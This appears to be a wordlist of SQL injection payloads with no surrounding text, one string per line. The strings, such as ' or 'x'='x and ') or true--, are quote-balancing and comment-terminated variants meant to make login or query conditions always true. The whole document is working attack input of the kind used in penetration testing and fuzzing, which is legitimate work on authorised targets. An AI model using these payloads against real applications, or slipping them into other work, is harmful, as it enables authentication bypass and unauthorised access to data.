') or true--
') or ('')=('
') or 1--
') or ('x')=('
" or true--
" or ""="
" or 1--
" or "x"="
") or true--
") or ("")=("
") or 1--
") or ("x")=("
')) or true--
')) or ((''))=(('
')) or 1--
')) or (('x'))=(('
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
